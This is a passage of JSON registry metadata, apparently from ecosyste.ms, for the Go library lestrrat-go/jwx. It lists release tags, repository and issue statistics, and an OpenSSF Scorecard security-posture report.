,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.960Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.518343491712521,"dependent_packages_count":6.109238404574462,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.313790948143492},"purl":"pkg:golang/github.com/%21lestrrat-go/jwx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Lestrrat-go/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Lestrrat-go/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Lestrrat-go/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FLestrrat-go%2Fjwx/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3863239,"name":"github.com/lestrrat-go/jwx/cmd/jwx","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-05-07T02:45:44.297Z","latest_release_number":null,"last_synced_at":"2026-05-07T02:45:45.616Z","created_at":"2022-04-11T21:56:15.242Z","updated_at":"2026-05-07T02:45:45.616Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/cmd/jwx","install_command":"go get github.com/lestrrat-go/jwx/cmd/jwx","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/cmd/jwx#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15: